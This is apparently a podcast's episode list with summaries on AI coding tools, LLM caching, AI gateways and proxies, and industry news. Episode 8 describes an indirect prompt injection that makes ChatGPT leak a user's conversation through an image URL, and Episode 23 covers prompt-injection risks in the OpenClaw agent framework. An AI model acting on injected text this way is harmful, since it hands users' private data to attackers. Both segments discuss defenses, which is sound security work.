Episodes

  • Episode 4: Claude Code Github Action
    Aug 19 2025

    In this episode of Before the Commit, the hosts dive deep into the evolving landscape of software development, automation, and AI’s role in reshaping industries beyond tech. The discussion spans GitHub Actions with Claude Code, the challenges of technical debt in an AI-driven era, the evolution of agile practices, and the disruptive effects of AI in creative fields like music and film.

    The conversation opens with a focus on Claude Code, which has emerged as both a CLI tool and SDK rather than a traditional IDE. When paired with GitHub Actions, Claude Code allows for asynchronous automation of tasks such as issue creation, code reviews, and pull requests. Unlike early Cursor background agents that felt heavy and remote, Claude Code provides a seamless and lightweight approach that lets developers collaborate with AI directly within their existing workflows.

    The hosts emphasize that while AI agents can handle much of the routine coding, the real challenge lies in how humans set up tasks and acceptance criteria. AI thrives when expectations are clearly defined, but complex, production-ready solutions still require human oversight. The emerging pattern is that AI can complete roughly 80–90% of development, while humans step in for the final polish—similar to a party planner fine-tuning the last details after their team has done the bulk of the setup.

    A central theme is whether technical debt still matters in an AI-first world. Traditionally, engineering teams have struggled with pressure from sales or business teams to deliver features quickly, leading to cut corners that accumulate as debt. However, with AI accelerating refactors and experimentation, the cost of “debt” may be far lower. The hosts argue that while inadvertent mistakes will still occur, the ability to quickly re-architect or refactor with AI challenges the old obsession with minimizing technical debt at all costs.

    The discussion pivots to the agile manifesto, now over 24 years old, and its evolution. Agile was never about rigid rules, but about moving away from the rigid, plan-everything-upfront waterfall model. Agile’s core value was early customer validation: deliver something quickly, get feedback, and adjust. With AI enabling rapid feature development, the dream of true continuous deployment—even faster than sprint cycles—may finally be achievable.

    The hosts highlight that agile and waterfall are not opposites but tools for different contexts. Waterfall is suited for predictable, high-stakes projects like launching rockets, while agile thrives in unpredictable markets where customer needs evolve rapidly.

    The conversation then shifts beyond coding, exploring how AI is reshaping music, film, and other arts.

    • AI-generated music: Some songs are now created entirely by AI, even mimicking collaborations between famous artists. While debates rage about copyright and originality, the hosts point out that no artist creates in a vacuum—every musician is influenced by predecessors. AI is no different, learning from prior works but generating unique compositions.

    • Ethics and ownership: Questions remain about who controls an artist’s likeness or style after death. The example of Princess Leia’s reappearance in Star Wars: Rise of Skywalker illustrates both the potential and controversy of resurrecting performers digitally.

    • Democratizing creativity: Just as AI empowers developers to experiment broadly, it lowers barriers in music and film. Individuals without traditional training can now compose songs, animate photos, or even produce short films. This mirrors past disruptions like Napster, SoundCloud, and streaming platforms.

    The hosts envision a future where movies, music, and games are dynamically tailored to individual preferences, with users even commissioning personal, high-quality films for themselves.

    1 hr and 5 mins
  • Episode 8: LLM Caching
    Sep 23 2025

    In this episode, the hosts discuss the latest news and trends in AI, focusing on LLM caching, a new EU regulation on AI-generated code, the changing landscape for Stack Overflow, and a recent AI security vulnerability.

    The hosts explain LLM caching as a technique to boost efficiency and cut costs for AI providers and developers. It involves saving parts of a prompt that are sent repeatedly, such as tool descriptions for a code agent or a developer's code. This means the provider doesn't need to re-tokenize and reprocess that content on every request, saving computational power. Providers offer a reduced rate for these cached tokens.
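
    As a rough illustration of the idea, the sketch below simulates caching a stable prompt prefix (for example, tool descriptions) and billing the cached part at a lower rate. Everything here is an assumption made for illustration: `PrefixCache`, `estimate_cost`, the whitespace "tokenizer", and the 10x price ratio are hypothetical and do not reflect any provider's actual API or pricing.

```python
import hashlib


class PrefixCache:
    """Toy stand-in for provider-side prompt caching (hypothetical names)."""

    def __init__(self):
        self._store = {}  # prefix hash -> already-processed prefix tokens

    def process(self, stable_prefix: str, dynamic_suffix: str) -> dict:
        """Return how many tokens were served from cache vs. processed fresh."""
        key = hashlib.sha256(stable_prefix.encode("utf-8")).hexdigest()
        cached = key in self._store
        if not cached:
            # Whitespace splitting stands in for the expensive processing step.
            self._store[key] = stable_prefix.split()
        prefix_len = len(self._store[key])
        suffix_len = len(dynamic_suffix.split())
        return {
            "cached_tokens": prefix_len if cached else 0,
            "fresh_tokens": suffix_len + (0 if cached else prefix_len),
        }


def estimate_cost(usage: dict, fresh_rate: float = 1.0, cached_rate: float = 0.1) -> float:
    """Illustrative billing: cached tokens cost a fraction of fresh ones."""
    return usage["fresh_tokens"] * fresh_rate + usage["cached_tokens"] * cached_rate


cache = PrefixCache()
tools = "tool: read_file tool: write_file tool: run_tests"
first = cache.process(tools, "fix the failing test")   # prefix processed fresh
second = cache.process(tools, "add a README")          # prefix served from cache
print(first, estimate_cost(first))
print(second, estimate_cost(second))
```

    The second request reuses the stored prefix, so only the new instruction counts as fresh work. Note that the cache only helps when the repeated content sits at the start of the prompt and is byte-for-byte identical.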

    The discussion also highlights proxies like LiteLLM, which can cache and reuse responses for multiple users even if their prompts aren't identical. This is achieved through semantic caching, which compares the meaning of prompts rather than their exact wording, allowing similar queries to receive the same cached answer.
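
    A minimal sketch of semantic caching follows, assuming a similarity threshold decides whether a new prompt is "close enough" to a stored one. The `SemanticCache` class and the 0.8 threshold are hypothetical, and the bag-of-words `embed` function is only a stand-in: it measures word overlap, whereas a real proxy would use a learned embedding model to capture meaning.

```python
import math
import re
from collections import Counter


def embed(text: str) -> Counter:
    """Stand-in embedding: lowercase word counts (not a real semantic model)."""
    return Counter(re.findall(r"[a-z0-9]+", text.lower()))


def cosine(a: Counter, b: Counter) -> float:
    """Cosine similarity between two sparse word-count vectors."""
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0


class SemanticCache:
    """Return a stored response when a new prompt is similar enough to an old one."""

    def __init__(self, threshold: float = 0.8):
        self.threshold = threshold
        self._entries = []  # list of (vector, response) pairs

    def put(self, prompt: str, response: str) -> None:
        self._entries.append((embed(prompt), response))

    def get(self, prompt: str):
        query = embed(prompt)
        best_score, best_response = 0.0, None
        for vector, response in self._entries:
            score = cosine(query, vector)
            if score > best_score:
                best_score, best_response = score, response
        return best_response if best_score >= self.threshold else None


cache = SemanticCache()
cache.put("how do I reverse a list in python", "Use list.reverse() or slicing.")
hit = cache.get("how do I reverse a python list")    # similar wording
miss = cache.get("what is the capital of France")    # unrelated question
print(hit, miss)
```

    The threshold is the main design choice: set it too low and users receive answers to questions they did not ask, set it too high and the cache rarely hits.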

    The hosts express skepticism about the European Union's new AI Act, which mandates that any code "substantially generated or assisted by an AI system" must be clearly identified. This "AI watermarking" aims to increase transparency, but it has open-source platforms debating whether to accept AI-generated code contributions at all due to legal and compliance issues.

    One host questions the regulation's practicality, seeing it as a fear-based, "proactive" measure for a problem that hasn't yet been observed. They point out the difficulty of reliably detecting and labeling AI-written code, especially as AI models improve at mimicking human styles. The hosts also note a study showing that AI coding assistants are more likely to introduce security vulnerabilities because they are trained on public code that often contains bugs and outdated security practices.

    The podcast covers the decline of Stack Overflow, attributing it to the rise of generative AI tools. Traffic has dropped, and Stack Overflow has responded by partnering with OpenAI to provide its data and adding its own AI features. The hosts believe Stack Overflow's data is a valuable asset that should be monetized rather than scraped.

    They conclude that Stack Overflow and similar content websites face a "generational problem." Younger users are less likely to use traditional sites, preferring integrated experiences like chatbots and AI assistants. They compare the future of the internet to a "Netflix algorithm," where AI will guide users directly to the content they need.

    In their "Secure or Sus" segment, the hosts discuss a security flaw that allows a threat actor to steal a user's ChatGPT conversation through an "indirect prompt injection." The attacker uploads a malicious prompt to a public website. When a user interacts with it, ChatGPT is tricked into generating an image whose URL secretly contains the user's conversation. The image then sends the conversation to the attacker's server.

    The hosts explain that this type of data exfiltration attack can be prevented with defensive measures like an LLM proxy and input/output sanitization. They note that similar vulnerabilities could exist in other AI-driven platforms and conclude that security in the age of AI requires proactive, disciplined measures rather than simply reacting to known vulnerabilities.
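
    One way to picture the output-sanitization defense is a filter that removes markdown images pointing at hosts that are not explicitly trusted, so a rendered image cannot carry conversation data to an attacker's server. This is a sketch under stated assumptions: `sanitize_output`, the allowlist, and the host names are hypothetical, and a production filter would also need to handle HTML image tags, links, and redirects.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts that model output may load images from.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Matches markdown images of the form ![alt](url "optional title").
MARKDOWN_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def sanitize_output(text: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> str:
    """Replace markdown images from untrusted hosts with a harmless placeholder."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in allowed_hosts:
            return match.group(0)  # trusted host: keep the image as written
        return f"[image removed: {alt or 'untrusted source'}]"

    return MARKDOWN_IMAGE.sub(replace, text)


malicious = "Summary done. ![chart](https://attacker.example/log?q=secret+chat)"
benign = "Our logo: ![logo](https://images.example.com/logo.png)"
print(sanitize_output(malicious))
print(sanitize_output(benign))
```

    Filtering on the way out complements, rather than replaces, input-side checks: the injected instruction may still reach the model, but the channel it relies on to leak data is closed.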

    1 hr and 18 mins
  • Episode 26: Agent Client Protocol and Antigravity
    Mar 18 2026

    This video transcript covers several key topics related to AI and technology, with a particular focus on Nvidia's new inference chips, the Agent Client Protocol (ACP), and Google's Antigravity IDE.

    Nvidia's GTC 2026 event highlighted their advancements in inference chips, emphasizing a "one chip for all" approach that can be used for both training and inference. This strategic shift is driven by rising data center costs and the growing demand for AI applications. Nvidia has already secured adoption from major cloud providers like AWS, Azure, and Google Cloud, as well as companies like ByteDance and PayPal. The new "Dynamo" chip is designed for data centers, orchestrating GPU memory resources to boost inference performance by up to seven times. It's noted that this chip is open-source, though the definition of open-source in AI is considered nuanced. The chip is specifically tailored for agentic AI workloads, optimizing request routing to GPUs with relevant short-term memory, moving beyond traditional chatbot applications.

    The discussion then shifts to the competitive landscape, mentioning specialized inference chips from companies like Groq and Cerebras, which have focused on optimizing solely for inference, reportedly achieving better results and cost-effectiveness than the "one chip for all" approach. Nvidia's acquisition of Groq for $20 billion is seen as a move to integrate this technology and avoid direct competition. The transcript also touches upon the geopolitical implications of AI chip supply chains, with tariffs and export controls being discussed as potential "weapons."

    A significant portion of the transcript is dedicated to the Agent Client Protocol (ACP). It's described as an open protocol that acts as a middleware layer between Integrated Development Environments (IDEs) and coding agents. ACP aims to standardize communication, allowing coding agents to interact with various IDEs seamlessly. This is compared to the Language Server Protocol (LSP), which standardized IDEs' understanding of programming languages. ACP was developed collaboratively by JetBrains and Zed Industries to address the need for a universal adapter for coding agents, enabling them to perform actions within IDEs like opening files, manipulating code, and interacting with the UI. Several IDEs, including Zed, JetBrains products, Neovim, and VS Code (via a plugin), are adopting ACP. Most coding agents also support it, with Google's Antigravity being a recent addition. The benefit of ACP is that it makes coding agents IDE-agnostic, allowing for easier integration and a more modular ecosystem.

    Google's Antigravity is presented as a new IDE for coding agents, built with an "agent manager" at its core, contrasting with the CLI-first approach of some other agents. It offers features like workspaces for managing different projects and threads for concurrent agent tasks within a workspace. Antigravity also includes "artifacts" such as walkthroughs (session synopses), browser recordings, and persistent memory, which are integral to its functionality. The IDE's ability to handle multiple agents and tasks within a unified interface, particularly through its inbox view, is highlighted as a significant advantage for user experience. The transcript also mentions that Antigravity can integrate with various AI models via API keys, with Gemini models currently being free during its preview phase. The discussion touches on the potential for a more unified control plane for agent orchestration and the future of AI development moving towards local, optimized models.

    1 hr and 3 mins
  • Episode 28: Cloudflare AI Gateway
    Apr 15 2026

    The video discusses several key topics related to AI and its impact on the tech industry.

    Firstly, it delves into Anthropic's "Mythos" model and "Project Glasswing." The speaker expresses skepticism about the hyped claims surrounding Mythos, suggesting that the limited release might be due to resource constraints (GPU availability) rather than its groundbreaking capabilities. The speaker draws parallels to Anthropic's past PR strategies, citing the "blackmailed engineer" story as an example of manufactured hype.

    Secondly, the video addresses the perceived "nerfing" of Anthropic's Claude Code. The speaker details a series of changes, including the introduction of "adaptive thinking," a reduction in default "effort" settings from high to medium, and the removal of visible "thinking" logs from the UI. These changes, while potentially offering cost savings for Anthropic, have led to performance degradation for users, particularly those engaging in complex tasks. The speaker notes that while these changes can be reverted manually, the opt-out nature and the timing of these updates are concerning.

    Thirdly, the discussion shifts to Cloudflare's AI Gateway. The speaker highlights its features, including virtual gateways with unique hashes for custom rules, compatibility with various SDKs (OpenAI, Anthropic), and logging capabilities. A key aspect is Cloudflare's use of Llama for processing "guardrails," which are implemented for content moderation (e.g., blocking defamation or political content). The speaker also notes the limitations of these guardrails, such as the lack of regex support for sensitive data like API keys, suggesting the gateway is more suited for corporate chatbots than coding environments. The caching, rate limiting, and alias features for API keys are also discussed as beneficial for managing AI access.

    Finally, the video touches upon the impact of AI on junior engineers. Statistics are presented indicating a decline in "programmer" job postings, contrasting with a smaller drop in "software developer" roles. The speaker suggests a shift from task-based junior roles to more AI-centric orchestration of agents. The speaker predicts a future shortage of software engineers, with companies increasingly needing junior engineers to manage AI systems, thereby elevating the importance of mentorship in AI agent management. The video concludes with a broader discussion on how AI is transforming various careers and the need for educational institutions to adapt their curricula to include AI proficiency. The overall sentiment is that while AI adoption presents challenges, it also creates significant opportunities for those who embrace it.

    1 hr and 4 mins
  • Episode 23: OpenClaw
    Feb 11 2026

    Welcome everybody to Before the Commit episode 23. With me as usual, I have my friend Dustin Hillgartner. This week, we're talking about OpenClaw, all things OpenClaw. There's really not much more to say other than we hope to break down what it is, some of the risks associated with it, and why it might actually be a good thing.

    OpenClaw is an open-source agent framework with potential benefits but significant security risks due to its broad access capabilities. It can integrate with messaging apps and utilizes a "skills" system for instructions. A scan revealed many internet-accessible instances, suggesting users may be unaware of the security implications. Risks include prompt injection attacks and plain-text credential storage. Prominent figures have advised caution.

    By default, OpenClaw can expose everything it has been granted access to. Exploits can involve retrieving credentials through prompt engineering. Its integration with messaging apps widens the attack surface. Key security concerns include lack of scoping, untrusted context sources, maximum privilege by default, and vulnerability to single-point compromises via prompt injection. The project's ease of misconfiguration and adoption by non-technical users exacerbate these issues.

    ModSecOps principles highlight OpenClaw's lack of security: skills execute with full permissions, context is untrusted, and it defaults to maximum privilege. Unlike multi-agent systems with adversarial reviews, OpenClaw's single-agent design is susceptible to prompt injection attacks. Exploits can bypass safety controls entirely. The analogy of an unquestioning employee with full access to sensitive data aptly describes its risk. Its open-source nature, while fostering development, also allows rapid exploitation, potentially spreading like a worm. Unpatched vulnerabilities and a lack of developer response further compound these dangers.

    1 hr and 4 mins
  • Episode 19: Ralph Wiggum and Grok Heavy
    Jan 9 2026

    Tailwind Labs and AI's Impact on Business Models

    The conversation begins by examining how AI is affecting established open-source projects like Tailwind Labs. Traditionally, companies monetize open-source by offering premium add-ons or services. However, AI, by enabling users to generate code and potentially create custom solutions internally, is seen as "cannibalizing" these revenue streams. This phenomenon is termed "AI Vampire Economics," where AI's capabilities reduce the need for pre-packaged solutions, impacting companies that rely on traffic to their websites for upselling. The example of Stack Overflow is mentioned, noting a decrease in traffic and new questions as AI tools provide answers directly. This trend is expected to impact many businesses that offer services built around developer tools and content.

    The "Build vs. Buy" Equation Revolutionized by AI

    AI is fundamentally altering the economic calculation of whether to build software solutions internally or purchase them as a service (SaaS). Previously, startups would buy essential services like ticketing or CRM systems due to the high development cost and time involved, allowing them to focus on their core intellectual property. Now, with AI coding assistants, building custom solutions internally can be significantly faster and more cost-effective. This shift allows for greater control over roadmaps and customization, potentially disrupting the SaaS market by enabling companies to create tailored solutions for specific needs without lengthy development cycles or reliance on third-party vendors.

    "Ralph Wiggum" Technique and Autonomous AI Agents

    A significant portion of the discussion revolves around the "Ralph Wiggum" technique, named after the Simpsons character who repeats himself. This technique involves using a bash script to repeatedly call an LLM (like Claude) with the same prompt. This is useful because LLMs have limitations in processing very long or complex tasks in a single pass. The Ralph Wiggum loop allows for the iterative completion of tasks, such as processing a long checklist or generating extensive documentation, by feeding the output of one prompt back into the next. The technique can be applied via CLI, SDKs (like Python), or integrated into CI/CD pipelines. It's highlighted that this technique is not exclusive to Claude but can be used with various LLMs and is particularly valuable for tasks requiring sustained, multi-step execution that would otherwise require constant human intervention. The discussion also touches on the importance of setting "max iterations" to prevent infinite loops and manage costs, especially with probabilistic AI models.

    Grok Heavy and the Future of AI Research

    The conversation then shifts to Grok Heavy, an AI model from xAI. While Grok is noted for its strengths in scientific and mathematical problem-solving, the discussion contrasts its capabilities with Claude's AI coding ecosystem. Grok Heavy is described as potentially being more powerful for complex, specialized problems, capable of spinning up multiple "agents" (instances of Grok) to tackle a single issue. However, it lacks the sophisticated orchestration and context engineering that Claude Code provides, making it less effective for general coding tasks where integrating with existing codebases and tools is crucial. The discussion also explores the broader implications of LLMs evolving beyond simple text prediction due to tool-calling capabilities, making them more powerful and, consequently, potentially more dangerous if not managed with robust safety measures and ethical considerations. The importance of AI "character" and responsible development, especially concerning autonomous decision-making in critical areas like healthcare and weaponry, is emphasized.
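
    The Ralph Wiggum loop described in this episode can be sketched as a small driver that sends the same prompt again and again until the agent reports completion or a max-iteration cap is hit. The episode describes a bash script; this Python version is only an illustration. `ralph_loop`, the `ALL TASKS COMPLETE` marker, and the fake agent are hypothetical names, and in real use `run_agent` would wrap a call to an LLM CLI or SDK, with progress persisted in the agent's workspace between calls.

```python
from typing import Callable, Tuple


def ralph_loop(
    run_agent: Callable[[str], str],
    prompt: str,
    done_marker: str = "ALL TASKS COMPLETE",
    max_iterations: int = 10,
) -> Tuple[bool, int]:
    """Send the same prompt repeatedly; stop on done_marker or at the cap.

    Returns (finished, iterations_used).
    """
    for iteration in range(1, max_iterations + 1):
        output = run_agent(prompt)
        if done_marker in output:
            return True, iteration
    # The cap prevents an endless (and costly) loop if the marker never appears.
    return False, max_iterations


def make_fake_agent(checklist):
    """Stand-in for an LLM agent: completes one checklist item per call."""
    remaining = list(checklist)

    def run_agent(prompt: str) -> str:
        if remaining:
            status = f"completed: {remaining.pop(0)}"
        else:
            status = "nothing left to do"
        if not remaining:
            status += "\nALL TASKS COMPLETE"
        return status

    return run_agent


PROMPT = "Pick the next unchecked item in TODO.md, finish it, and check it off."
finished, used = ralph_loop(make_fake_agent(["docs", "tests", "lint"]), PROMPT)
capped, capped_used = ralph_loop(make_fake_agent(["a", "b", "c"]), PROMPT, max_iterations=2)
print(finished, used, capped, capped_used)
```

    The prompt never changes between iterations; what changes is the state the agent finds when it starts, which is why the technique suits checklists and other work that can be resumed from files.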

    1 hr and 12 mins
  • Episode 7: LiteLLM
    Sep 9 2025

    Hosts Dustin Hillgartner and Danny Gershman discuss securing large language models (LLMs) amid rising "shadow AI" risks, where employees use unmonitored tools like ChatGPT, leading to unintentional data spills (e.g., sensitive info, code). Echoing shadow IT, they stress education, policies, and multi-layered defenses over bans, as prohibition drives underground use—studies show ~40% of workers admit to AI usage despite restrictions.

    LiteLLM: Open-Source LLM Proxy

    Central focus: LiteLLM as a tool to combat shadow AI. It's a proxy funneling all LLM calls through a controlled channel, blocking public providers (e.g., forcing use of secure ones like AWS Bedrock GovCloud). Key features:

    - Visibility & Tracking: Logs usage, errors, spending per employee/team; identifies high performers needing training.

    - Security: Guardrails (WAF-like) scan and block sensitive data (e.g., API keys, code) before transmission; supports RBAC via virtual keys from secret stores (e.g., AWS/Azure), preventing shared master keys.

    - Management: Rate limiting, budgets, load balancing across providers/models; fallbacks if limits hit; RAG integration for team-specific data/models (e.g., support vs. data science).

    - Integration: Pipes logs to observability tools; open-source core, enterprise version adds SSO.

    Not a silver bullet, but enables safe, company-provided AI to boost productivity without leaks. Encourages "bring your own model" policies with oversight, avoiding moral hazards like unvetted tools exposing IP/HIPAA data. In gov/defense, it ensures FedRAMP compliance.
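
    To make the guardrail idea concrete, here is a minimal sketch of a pre-transmission check that scans an outgoing prompt for secrets and blocks it if any are found. This is not LiteLLM's API: `scan_prompt`, `guard`, and the pattern set are hypothetical, and the three patterns are illustrative rather than a complete secret-detection ruleset.

```python
import re

# Illustrative patterns only; a real deployment would use a maintained ruleset.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "generic_api_key": re.compile(
        r"(?i)\b(?:api[_-]?key|token)\s*[:=]\s*['\"]?[A-Za-z0-9_\-]{16,}"
    ),
}


def scan_prompt(prompt: str) -> list:
    """Return the sorted names of all secret patterns found in the prompt."""
    return sorted(name for name, pattern in SECRET_PATTERNS.items() if pattern.search(prompt))


def guard(prompt: str) -> str:
    """Pass the prompt through unchanged, or raise if it contains a likely secret."""
    findings = scan_prompt(prompt)
    if findings:
        raise ValueError(f"prompt blocked, possible secrets: {', '.join(findings)}")
    return prompt


leaky = "please debug this config: AKIAIOSFODNN7EXAMPLE"
also_leaky = "api_key = 'abcd1234abcd1234abcd'"
print(scan_prompt(leaky), scan_prompt(also_leaky), scan_prompt("explain recursion"))
```

    Blocking at the proxy means the check applies to every tool and team that routes through it, which is the point of funneling all LLM calls through one controlled channel.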

    IDE Exploration: Warp

    Brief dive into Warp, a terminal-first AI CLI (vs. code-first like VS Code/Cursor). Competes with Claude Code; runs as standalone app with natural language prompts (e.g., "change directory to X") for bash tasks (Git history, logs, Kubernetes). Adds side panels for coding (rules, autocomplete). Scope spans entire hard drive (powerful for workflows but raises privacy concerns—data sent?). Hosts note it's like an "AI makefile" for your computer, but terminal focus feels secondary for pure coding. Ties to NVIDIA CEO's quip: "English is the new coding language."

    AI in Gov Contracting

    AI lowers barriers for proposals (e.g., auto-generating 10-page whitepapers), homogenizing responses and flooding SAM.gov. Makes differentiation hard; calls for more human eval (demos, prototypes via OTAs) over paper reviews. Gov should adopt private-sector agility (trials, betas) while maintaining security—less bespoke risk, more platforms.

    Coding's Future & Security

    Debate: Will coding devolve to English/binary? Source code aids compliance/trust now (static analysis for vulnerabilities), but dynamic testing (fuzzing, WAFs) could mature to make it obsolete. AI as "Play-Doh machine at light speed" needs guardrails to avoid chaos; interim relies on human oversight.

    Newz or Noize

    - Anthropic Lawsuit: $1.5B class action for training on ~500K pirated copyrighted books from shadow libraries. Publishers seek payouts; signals wave of suits (OpenAI, Grok next?). Reddit sued Anthropic separately in June over data scraping.

    - Copyright in AI Era: Fair use debate—reading/learning OK, but mass ingestion for commercial models? Humans can't replicate styles en masse; AI can (e.g., "new Game of Thrones"). Needs evolved laws: license data, monetize via new models (like Napster → streaming). Frequency/scalability challenges enforcement; transformative use key.

    - AI in Film: Reconstructing lost 40-min Orson Welles footage (1940s) using old photos/radio + AI.

    1 hr and 6 mins
  • Episode 29: Agentgateway and Portkey
    Apr 23 2026

    The podcast episode covers several key topics related to AI and technology.

    SpaceX Acquires Cursor

    A significant portion of the discussion revolves around SpaceX's potential acquisition of Cursor, an AI-powered code editor. The deal is valued at $60 billion, highlighting the increasing value placed on AI and software development tools. The merger of xAI (Elon Musk's AI company) into SpaceX is explained as the entity behind this acquisition. This move is seen as SpaceX's strategy to bolster its AI capabilities, particularly in coding, by acquiring Cursor's technology and talent. The acquisition is also discussed in the context of existing AI coding tools like Claude Code and OpenAI's Codex.

    The Value of Software and Talent

    The high valuation of Cursor, a company that emerged recently, underscores the immense value of software and the engineering talent behind it. The discussion touches on the idea of "acqui-hiring," where companies acquire others primarily for their skilled workforce. The $60 billion figure is considered substantial, even for an acqui-hire, emphasizing the scarcity and importance of specialized AI and software engineering talent.

    AI Gateways: Portkey and Agentgateway

    The "Tool of the Week" segment delves into AI gateways.

    - Agentgateway (Solo.io): This solution is described as a Kubernetes-based orchestration tool for managing AI agents. It focuses on providing governance, policies, and routing rules for containerized AI agents within a Kubernetes cluster, integrating with tools like Istio. It's positioned as an "AI governance" solution for managing inter-agent communication.

    - Portkey: This is presented as a SaaS-based AI gateway that acts as a proxy server. It offers features like user management, analytics, logging, and a robust system for managing API keys, prompts, and guardrails. A unique aspect highlighted is Portkey's ability to manage prompts and their versioning outside of application code, enabling A/B testing and easier modification of AI behavior without code changes. It also supports agent integration via the A2A protocol.

    AI's Impact on the Workforce and Layoffs

    The podcast discusses the broader implications of AI on employment. Snap's recent layoff of 1,000 employees is cited, with the CEO attributing it to AI taking over a significant portion of coding tasks (over 65%). This sparks a discussion on whether these layoffs are due to overhiring or a genuine shift in required skills, suggesting that companies are adapting to AI's capabilities by seeking new types of talent or upskilling existing employees. The trend is seen as a leading indicator for other industries, implying a future where AI augmentation or replacement of roles will become more common across various departments, not just engineering.

    AI and Copyright Concerns

    A significant legal development is discussed: Anthropic's argument before a federal judge that training its AI models on copyrighted song lyrics constitutes "transformative fair use." This case is seen as setting important legal precedents for the entire AI industry regarding the use of copyrighted data for training. The discussion touches on the vast scale of data used in AI training, the immense potential copyright infringement damages, and the practical challenges of enforcing these laws in the AI era. The analogy is made between how humans learn from creative works and how AI models are trained, raising questions about the future of intellectual property in the age of AI.
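
    Returning to the gateway segment's point about managing prompts and their versions outside application code, the idea can be sketched as a versioned prompt table plus a deterministic A/B split. This is not Portkey's API: `PROMPT_VERSIONS`, `AB_SPLIT`, `pick_version`, and `render` are hypothetical names, and in practice the two tables would live in the gateway's configuration rather than in the application.

```python
import hashlib

# Hypothetical prompt store; in a gateway this lives outside application code.
PROMPT_VERSIONS = {
    "support_greeting": {
        "v1": "You are a support agent. Greet {name} briefly.",
        "v2": "You are a friendly support agent. Greet {name} and offer help.",
    }
}

# Hypothetical traffic split: (version, percentage) pairs summing to 100.
AB_SPLIT = {"support_greeting": [("v1", 50), ("v2", 50)]}


def pick_version(prompt_name: str, user_id: str, split=AB_SPLIT) -> str:
    """Assign a user to a prompt version deterministically by hashing their ID."""
    digest = hashlib.sha256(f"{prompt_name}:{user_id}".encode("utf-8")).digest()
    bucket = int.from_bytes(digest[:4], "big") % 100  # stable bucket in 0..99
    cumulative = 0
    for version, weight in split[prompt_name]:
        cumulative += weight
        if bucket < cumulative:
            return version
    return split[prompt_name][-1][0]


def render(prompt_name: str, user_id: str, **variables) -> tuple:
    """Return (version, rendered prompt) for this user."""
    version = pick_version(prompt_name, user_id)
    return version, PROMPT_VERSIONS[prompt_name][version].format(**variables)


version, text = render("support_greeting", "user-42", name="Ada")
print(version, text)
```

    Because assignment depends only on the prompt name and user ID, a user sees the same variant on every request, and changing the split or the prompt text requires no application deploy.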

    1 hr